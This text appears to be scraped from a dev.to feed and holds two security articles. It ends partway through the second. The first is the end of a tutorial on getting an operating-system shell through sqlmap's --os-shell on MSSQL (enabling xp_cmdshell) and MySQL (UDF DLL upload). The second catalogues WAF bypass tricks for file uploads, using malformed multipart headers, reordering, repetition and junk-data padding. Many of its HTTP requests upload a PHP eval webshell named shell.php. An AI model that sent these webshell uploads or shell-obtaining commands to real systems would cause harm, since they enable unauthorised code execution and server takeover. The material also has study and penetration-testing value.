href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4i9eghnjgsdtbc6h2js6.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4i9eghnjgsdtbc6h2js6.png" alt=" " width="625" height="273"></a></p> <p><strong>Step 4 – The shell is deleted.</strong></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4anb8jzgd266dxkkaamu.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4anb8jzgd266dxkkaamu.png" alt=" " width="668" height="243"></a></p> <p>A command is issued to remove the shell file.</p> <h2> Database‑Based <code>--os-shell</code> </h2> <p>When the database permits external connections, sqlmap can obtain a shell directly via the <code>--os-shell</code> flag.</p> <h3> Microsoft SQL Server </h3> <p><strong>Prerequisites:</strong></p> <ul> <li>The database server accepts external connections. </li> <li>The current database user holds <code>sa</code> (system administrator) privileges.</li> </ul> <p>With SQL Server, <code>--os-shell</code> relies on the <code>xp_cmdshell</code> extended stored procedure to execute operating system commands.</p> <h4> Test Environment </h4> <ul> <li>Operating system: Microsoft Windows Server 2016 Datacenter </li> <li>Database: Microsoft SQL Server 2008 </li> </ul> <p>Sqlmap is used to connect to the database.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>sqlmap <span class="nt">-d</span> <span class="s2">"mssql://user:password@ip:port/dbname"</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm9nw0cqhvujvniko4ubi.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fm9nw0cqhvujvniko4ubi.png" alt=" " width="798" height="122"></a></p> <p>Sqlmap does not ship with the <code>pymssql</code> module; it must be installed manually.</p> <p>After executing <code>python -m pip install pymssql</code>, the connection is established successfully.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsdblmrzpuxqswh3ewv2y.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsdblmrzpuxqswh3ewv2y.png" alt=" " width="800" height="180"></a></p> <p>The <code>--os-shell</code> command is then issued.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgf1zp2ydxedscyw1c235.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgf1zp2ydxedscyw1c235.png" alt=" " width="799" height="310"></a></p> <p><strong>At this point, sqlmap performs three key actions:</strong></p> <ol> <li>Identifies the database type and displays it. </li> <li>Checks whether the current user is a database administrator (i.e., verifies <code>sa</code> privileges). </li> <li>Determines whether <code>xp_cmdshell</code> is enabled; if it is not, sqlmap attempts to enable it.</li> </ol> <p>In this instance, sqlmap was unable to activate <code>xp_cmdshell</code> automatically.</p> <p>Consequently, <code>--sql-shell</code> was used to enable it manually:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">EXEC</span> <span class="n">sp_configure</span> <span class="s1">'show advanced options'</span><span class="p">,</span> <span class="mi">1</span><span class="p">;</span> <span class="n">RECONFIGURE</span><span class="p">;</span> <span class="k">EXEC</span> <span class="n">sp_configure</span> <span class="s1">'xp_cmdshell'</span><span class="p">,</span> <span class="mi">1</span><span class="p">;</span> <span class="n">RECONFIGURE</span><span class="p">;</span> </code></pre> </div> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fae5kodqb9t3iw2k79knr.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fae5kodqb9t3iw2k79knr.png" alt=" " width="800" height="223"></a></p> <p>When <code>RECONFIGURE;</code> was executed, sqlmap reported a syntax error.</p> <p>A Python script calling the <code>pymssql</code> module was written to isolate the issue.</p> <p>The <code>SELECT @@version;</code> command could be executed successfully.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fckj92g87aptgtggmlwwf.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fckj92g87aptgtggmlwwf.png" alt=" " width="800" height="234"></a></p> <p>The error produced when executing <code>RECONFIGURE;</code> matched the error observed in <code>--sql-shell</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fscsuwl8z0s9eetfp0gao.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fscsuwl8z0s9eetfp0gao.png" alt=" " width="799" height="269"></a></p> <p>Because sqlmap uses the <code>pymssql</code> module for database connections, it was necessary to enable <code>xp_cmdshell</code> using an alternative tool. Navicat was employed for this purpose.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhgu8bt7j6rwlfv3c2suu.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhgu8bt7j6rwlfv3c2suu.png" alt=" " width="566" height="608"></a></p> <p>The commands to enable <code>xp_cmdshell</code> were then executed.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6mqcg3ayu85z2c6djqqz.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F6mqcg3ayu85z2c6djqqz.png" alt=" " width="800" height="450"></a></p> <p>Once enabled, commands could be issued either through Navicat or by using sqlmap’s <code>--os-shell</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpwvkyffcxptkq0a3zet6.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpwvkyffcxptkq0a3zet6.png" alt=" " width="717" height="306"></a></p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw5zf2xpty9rz3kvn4s43.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw5zf2xpty9rz3kvn4s43.png" alt=" " width="800" height="270"></a></p> <p>If a tool such as Navicat is used for the initial connection, one must manually verify whether the user is a database administrator and whether <code>xp_cmdshell</code> is present.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SELECT</span> <span class="n">IS_SRVROLEMEMBER</span><span class="p">(</span><span class="s1">'sysadmin'</span><span class="p">)</span> </code></pre> </div> <p>This determines if the user holds the <code>sa</code> role.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SELECT</span> <span class="k">COUNT</span><span class="p">(</span><span class="o">*</span><span class="p">)</span> <span class="k">FROM</span> <span class="n">master</span><span class="p">.</span><span class="n">dbo</span><span class="p">.</span><span class="n">sysobjects</span> <span class="k">WHERE</span> <span class="n">xtype</span><span class="o">=</span><span class="s1">'x'</span> <span class="k">AND</span> <span class="n">name</span><span class="o">=</span><span class="s1">'xp_cmdshell'</span><span class="p">;</span> </code></pre> </div> <p>A result of <code>1</code> indicates that <code>xp_cmdshell</code> exists.</p> <p>After these checks, the process follows the same pattern described above.</p> <p>A Wireshark capture of the TCP stream reveals the data sent.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdpg4omcp3zgxaqyx4opc.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdpg4omcp3zgxaqyx4opc.png" alt=" " width="800" height="271"></a></p> <p>The code was copied to a text file and certain characters were replaced.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe034g8zfro0pzbayk20c.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fe034g8zfro0pzbayk20c.png" alt=" " width="800" height="258"></a></p> <p>Before executing the user‑supplied command, sqlmap runs <code>ping -n 10 127.0.0.1</code> and <code>echo 1</code> (marked as ① and ② in the figure). The commands that follow (③ onwards) are hex‑encoded.</p> <h3> MySQL </h3> <p><strong>Prerequisites:</strong></p> <ul> <li>The database server permits external connections. </li> <li>The <code>secure_file_priv</code> variable is either empty or set to a writable path. </li> <li>Write access to the MySQL installation directory is available. </li> <li>For versions greater than 5.1, the <code>/lib/plugin</code> directory must exist.</li> </ul> <p>The MySQL <code>--os-shell</code> method leverages user‑defined functions (UDFs) to execute commands. This topic is covered in greater detail in the article <a href="https://cooltige.github.io/2020/06/02/Mysql-Udf%E6%8F%90%E6%9D%83/" rel="noopener noreferrer">MySQL UDF Privilege Escalation</a>.</p> <h4> Test Environment </h4> <ul> <li>Operating system: Microsoft Windows Server 2012 Standard </li> <li>Database: MySQL 5.1.60 </li> </ul> <p>Sqlmap is used to connect to the database.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8acbd1nz90sz9k3cxj3u.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8acbd1nz90sz9k3cxj3u.png" alt=" " width="800" height="126"></a></p> <p>After installing <code>pymysql</code>, a second connection attempt is made; upon success, sqlmap displays the approximate database version.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9ei94wbkiye0u4kx8cyg.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9ei94wbkiye0u4kx8cyg.png" alt=" " width="799" height="146"></a></p> <p>The <code>--os-shell</code> flag is then issued.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fswz8uqw9jgruo2xmmr2q.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fswz8uqw9jgruo2xmmr2q.png" alt=" " width="799" height="350"></a></p> <p><strong>At this point, sqlmap performs five key actions:</strong></p> <ol> <li>Connects to the MySQL database and retrieves its version. </li> <li>Verifies whether the current user is a database administrator. </li> <li>Checks if the <code>sys_exec</code> and <code>sys_eval</code> functions have already been created. </li> <li>Uploads the appropriate DLL file to the target directory. </li> <li>When the user exits, removes the <code>sys_exec</code> and <code>sys_eval</code> functions (by default).</li> </ol> <p>A Wireshark TCP stream capture is analysed. The image below provides a detailed illustration of the process.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub-production-user-asset-6210df.s3.amazonaws.com%2F83846602%2F605389233-3ca82389-50d8-4b4f-9425-03846ba7f878.png%3FX-Amz-Algorithm%3DAWS4-HMAC-SHA256%26X-Amz-Credential%3DAKIAVCODYLSA53PQK4ZA%252F20260609%252Fus-east-1%252Fs3%252Faws4_request%26X-Amz-Date%3D20260609T222641Z%26X-Amz-Expires%3D300%26X-Amz-Signature%3D4c116f91cd6d39b94a49c22ce1edfb220f0022c27cb1b43df485b5695bdbca52%26X-Amz-SignedHeaders%3Dhost%26response-content-type%3Dimage%252Fpng" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fgithub-production-user-asset-6210df.s3.amazonaws.com%2F83846602%2F605389233-3ca82389-50d8-4b4f-9425-03846ba7f878.png%3FX-Amz-Algorithm%3DAWS4-HMAC-SHA256%26X-Amz-Credential%3DAKIAVCODYLSA53PQK4ZA%252F20260609%252Fus-east-1%252Fs3%252Faws4_request%26X-Amz-Date%3D20260609T222641Z%26X-Amz-Expires%3D300%26X-Amz-Signature%3D4c116f91cd6d39b94a49c22ce1edfb220f0022c27cb1b43df485b5695bdbca52%26X-Amz-SignedHeaders%3Dhost%26response-content-type%3Dimage%252Fpng" alt=" " width="600" height="1188"></a></p> sql sqlmap shell cybersecurity A Comprehensive Overview of WAF Bypass Methods for File Upload Vulnerabilities Excalibra Mon, 08 Jun 2026 02:06:22 +0000 https://dev.to/excalibra/a-comprehensive-overview-of-waf-bypass-methods-for-file-upload-vulnerabilities-2gp4 https://dev.to/excalibra/a-comprehensive-overview-of-waf-bypass-methods-for-file-upload-vulnerabilities-2gp4 <h2> Analysis of HTTP File Upload Packets </h2> <p>File upload is fundamentally a client-side POST request wherein the message body contains upload information. The front-end upload page must specify an <code>enctype</code> of <code>multipart/form-data</code> to permit a successful upload.</p> <p>A typical file upload packet resembles the following:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="nf">POST</span> <span class="nn">http://www.example.com</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="na">Content-Type</span><span class="p">:</span><span class="s">multipart/form-data; boundary=----WebKitFormBoundaryyb1zYhTI38xpQxBK</span> ------WebKitFormBoundaryyb1zYhTI38xpQxBK Content-Disposition: form-data; name="city_id" 1 ------WebKitFormBoundaryyb1zYhTI38xpQxBK Content-Disposition: form-data; name="company_id" 2 ------WebKitFormBoundaryyb1zYhTI38xpQxBK Content-Disposition: form-data; name="file"; filename="chrome.png" Content-Type: image/png PNG ... content of chrome.png ... ------WebKitFormBoundaryyb1zYhTI38xpQxBK-- </code></pre> </div> <p>The following characteristics may be extracted from the above:</p> <ul> <li>The request header <code>Content-Type</code> exhibits these features: <ul> <li> <code>multipart/form-data</code> – indicates that the request is a file upload request.</li> <li>Presence of a <code>boundary</code> string – serves as a delimiter to separate POST data.</li> </ul> </li> <li>The POST body contains: <ul> <li> <code>Content-Disposition</code> – a response header that indicates whether the content is expected to be displayed inline in the browser.</li> <li> <code>name</code> – the name of the HTML form field referenced by this part.</li> <li> <code>filename</code> – a string that holds the original name of the file being transmitted.</li> </ul> </li> <li>The value of <code>boundary</code> in the POST body is the value declared in <code>Content-Type</code> prefixed with two hyphens <code>--</code>, except for the final closing boundary.</li> <li>The closing boundary appends two additional hyphens by default (in testing, removing the last boundary line does not prevent a successful upload).</li> </ul> <h3> Modifiable Elements in a File Upload Packet </h3> <ul> <li> <strong>Content-Disposition</strong> – generally alterable.</li> <li> <strong>name</strong> – the form parameter value; should not be altered.</li> <li> <strong>filename</strong> – the file name; can be modified.</li> <li> <strong>Content-Type</strong> – the file MIME type; can be changed depending on context.</li> <li> <strong>boundary</strong> – the content delimiter; can be modified.</li> </ul> <h2> How WAFs Intercept Malicious Files </h2> <p>Consider how one might design a WAF. Defence may be approached from several angles:</p> <ul> <li> <strong>File name</strong> – parse the file name and determine whether it appears in a blacklist.</li> <li> <strong>File content</strong> – parse the file content to detect whether it constitutes a webshell.</li> <li> <strong>File directory permissions</strong> – typically requires a host-based WAF.</li> </ul> <p>Currently, most common WAFs parse the file name; a minority, such as Chaitin, also inspect file content. The discussion below focuses on file‑name‑based interception.</p> <p>The general process is as follows:</p> <ol> <li>Extract the <code>boundary</code> value from the <code>Content-Type</code> header of the request.</li> <li>Using the boundary, parse the POST data to obtain the file name.</li> <li>Determine whether the file name falls within an interception blacklist or outside a whitelist.</li> </ol> <blockquote> <p>Having understood how a WAF intercepts malicious files, I classify common bypass methods into the following categories. A demonstration using the latest version of Safedog concludes the article.</p> </blockquote> <h2> Character Mutations </h2> <h3> Quotation Mark Variations </h3> <p>Values in header fields can be enclosed in single quotes, double quotes, or no quotes at all, without affecting the upload outcome.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Content-Disposition: "form-data"; name=file_x; filename="xx.php" Content-Disposition: form-data; name=file_x; filename="xx.php" Content-Disposition: form-data; name=file_x; filename=xx.php Content-Disposition: form-data; name="file_x"; filename=xx.php Content-Disposition: form-data; name='file_x'; filename='xx.php' Content-Disposition: 'form-data'; name="file_x"; filename='xx.php' </code></pre> </div> <p>It is also possible to omit the trailing quotation mark of the <code>filename</code> string, and the upload will still succeed.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Content-Disposition: form-data; name="file_x"; filename="xx.php Content-Disposition: form-data; name="file_x"; filename='xx.php Content-Disposition: form-data; name="file_x"; filename="xx.php; </code></pre> </div> <h3> Case Modifications </h3> <p>The following three fixed strings may be subjected to case changes:</p> <ul> <li><code>Content-Disposition</code></li> <li><code>name</code></li> <li><code>filename</code></li> </ul> <p>For example, <code>name</code> may become <code>Name</code>, and <code>Content-Disposition</code> may become <code>content-disposition</code>.</p> <h3> Inserting Line Break Characters </h3> <p>Line breaks can be inserted between a field value and the equals sign; here the character <code>[0x09]</code> is used to represent a line break.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Content-Disposition: "form-data"; name="file_x"; filename=[0x09]"xx.php" Content-Disposition: "form-data"; name="file_x"; filename=[0x09]"xx.php Content-Disposition: "form-data"; name="file_x"; filename=[0x09]"xx.php"[0x09] Content-Disposition: "form-data"; name="file_x"; filename=[0x09]xx.php Content-Disposition: "form-data"; name="file_x"; filename=[0x09]xx.php[0x09]; </code></pre> </div> <h3> Multiple Semicolons </h3> <p>During file parsing, the presence of multiple semicolons may prevent the WAF from correctly extracting the file name, thereby enabling a bypass.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Content-Disposition: form-data; name="file_x";;; filename="test.php" </code></pre> </div> <h3> Multiple Equals Signs </h3> <p>Using multiple equals signs within the POST content has no effect on file upload.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Content-Disposition: form-data; name=="file_x"; filename===="test.php" </code></pre> </div> <h3> Altering the Content-Disposition Value </h3> <p>Some WAFs assume that the value of <code>Content-Disposition</code> must be <code>form-data</code>, which can lead to bypasses. In fact, <code>Content-Disposition</code> may be arbitrarily altered or left empty.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Content-Disposition: fOrM-DaTA; name="file_x"; filename="xx.php" Content-Disposition: form-da+ta; name="file_x"; filename="xx.php" Content-Disposition: fo r m-dat a; name="file_x"; filename="xx.php" Content-Disposition: form-dataxx; name="file_x"; filename="xx.php" Content-Disposition: name="file_x"; filename="xx.php" </code></pre> </div> <h3> Malformed Boundary Headers </h3> <p>The <code>boundary</code> can be mutated in the following ways without affecting the upload.</p> <p>Normal <code>boundary</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err">Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye111 </span></code></pre> </div> <p>Malformed <code>boundary</code> variations:</p> <ul> <li>The case of <code>multipart/form-data</code> may be changed: </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err"> Content-Type: mUltiPart/ForM-dATa; boundary=----WebKitFormBoundarye111 </span></code></pre> </div> <ul> <li>Spaces may separate <code>multipart/form-data</code> and <code>boundary</code>, and arbitrary content may be inserted between them: </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err"> Content-Type: multipart/form-data boundary=----WebKitFormBoundarye111 Content-Type: multipart/form-data x boundary=----WebKitFormBoundarye111 Content-Type: multipart/form-data abcdefg boundary=----WebKitFormBoundarye111 Content-Type: multipart/form-data a\|/?!@#$%^() boundary=----WebKitFormBoundarye111 </span></code></pre> </div> <ul> <li>A comma may separate <code>multipart/form-data</code> and <code>boundary</code>, with arbitrary content inserted between: </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err"> Content-Type: multipart/form-data,boundary=----WebKitFormBoundarye111 Content-Type: multipart/form-data,x,boundary=----WebKitFormBoundarye111 Content-Type: multipart/form-data,abcdefg,boundary=----WebKitFormBoundarye111 Content-Type: multipart/form-data,a\|/?!@#$%^(),boundary=----WebKitFormBoundarye111 </span></code></pre> </div> <ul> <li>Arbitrary content may be inserted directly before the <code>boundary</code> string (feasible on PHP): </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err"> Content-Type: multipart/form-data;bypass&amp;123**{|}boundary=----WebKitFormBoundarye111 Content-Type: multipart/form-data bypass&amp;123**{|}boundary=----WebKitFormBoundarye111 Content-Type: multipart/form-data,bypass&amp;123**{|}boundary=----WebKitFormBoundarye111 </span></code></pre> </div> <ul> <li>At the end of the <code>boundary</code>, a comma or semicolon may be used to separate and insert arbitrary content: </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="err"> Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye111;123abc Content-Type: multipart/form-data; boundary=----WebKitFormBoundarye111,123abc </span></code></pre> </div> <h2> Sequence Reversal </h2> <h3> Swapping the Order of name and filename </h3> <p>Because <code>Content-Disposition</code> must appear first, only the order of <code>name</code> and <code>filename</code> can be reversed. Some WAFs may expect <code>name</code> before <code>filename</code>, enabling a bypass.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Content-Disposition: form-data; filename="xx.php"; name="file_x" </code></pre> </div> <h3> Swapping the Order of Content-Disposition and Content-Type </h3> <p>Similarly, the order of <code>Content-Disposition</code> and <code>Content-Type</code> can be exchanged.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Content-Type: image/png Content-Disposition: form-data; name="upload_file"; filename="shell.php" </code></pre> </div> <h3> Swapping the Order of Different Boundary Contents </h3> <p>The contents of different boundary parts may also be reordered without affecting the upload.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>------WebKitFormBoundaryzEHC1GyG8wYOH1rf Content-Disposition: form-data; name="submit" 上传 ------WebKitFormBoundaryzEHC1GyG8wYOH1rf Content-Disposition: form-data; name="upload_file"; filename="shell.php" Content-Type: image/png &lt;?php @eval($_POST['x']);?&gt; ------WebKitFormBoundaryzEHC1GyG8wYOH1rf-- </code></pre> </div> <h2> Data Repetition </h2> <h3> Repetition of Boundary Content </h3> <p>The file ultimately uploaded is <code>shell.php</code> rather than <code>shell.jpg</code>. However, if only the first file name is extracted, a bypass may occur.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>------WebKitFormBoundarymeEzpUTMsmOfjwAA Content-Disposition: form-data; name="upload_file"; filename="shell.jpg" Content-Type: image/png &lt;?php @eval($_POST['hack']); ?&gt; ------WebKitFormBoundarymeEzpUTMsmOfjwAA Content-Disposition: form-data; name="upload_file"; filename="shell.php" Content-Type: image/png &lt;?php @eval($_POST['hack']); ?&gt; ------WebKitFormBoundarymeEzpUTMsmOfjwAA Content-Disposition: form-data; name="submit" 上传 ------WebKitFormBoundarymeEzpUTMsmOfjwAA-- </code></pre> </div> <p>The following variant also achieves a successful upload:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>------WebKitFormBoundarymeEzpUTMsmOfjwAA ------WebKitFormBoundarymeEzpUTMsmOfjwAA-- ------WebKitFormBoundarymeEzpUTMsmOfjwAA;123 ------WebKitFormBoundarymeEzpUTMsmOfjwAA Content-Disposition: form-data; name="upload_file"; filename="shell.php" Content-Type: image/png &lt;?php @eval($_POST['hack']); ?&gt; ------WebKitFormBoundarymeEzpUTMsmOfjwAA Content-Disposition: form-data; name="submit" 上传 ------WebKitFormBoundarymeEzpUTMsmOfjwAA-- </code></pre> </div> <h3> Repetition of filename </h3> <p>The final uploaded file name is <code>shell.php</code>. However, because the file name is extracted by matching the first occurrence, regular expressions will typically match the first instance.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Content-Disposition: form-data; name="upload_file"; filename="shell.jpg filename="shell.jpg"; filename="shell.jpg"; filename="shell.php"; </code></pre> </div> <h2> Data Overflow </h2> <h3> Inserting Junk Data Between name and filename </h3> <p>A large volume of junk data may be inserted between <code>name</code> and <code>filename</code>.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight http"><code><span class="nf">POST</span> <span class="nn">/Pass-02/index.php</span> <span class="k">HTTP</span><span class="o">/</span><span class="m">1.1</span> <span class="na">Host</span><span class="p">:</span> <span class="s">hackrock.com:813</span> <span class="na">Content-Type</span><span class="p">:</span> <span class="s">multipart/form-data; boundary=----WebKitFormBoundaryzEHC1GyG8wYOH1rf</span> <span class="na">Connection</span><span class="p">:</span> <span class="s">close</span> ------WebKitFormBoundaryzEHC1GyG8wYOH1rf Content-Disposition: form-data; name="upload_file"; fbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b8dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf8658dafbf0fd31ead48dcc0b9f2312bf; filename="shell.php" Content-Type: image/png &lt;?php @eval($_POST['x']);?&gt; ------WebKitFormBoundaryzEHC1GyG8wYOH1rf Content-Disposition: form-data; name="submit" 上传 ------WebKitFormBoundaryzEHC1GyG8wYOH1rf-- </code></pre> </div> <blockquote> <p><strong>Note:</strong> A semicolon must be placed after the large volume of junk data.</p> </blockquote> <h3> Inserting Junk Data into the Boundary String </h3> <p>The boundary string can contain arbitrary data (subject to length limitations). When the length exceeds what the WAF can process but the web server can still handle, the file upload may bypass the WAF.<br> 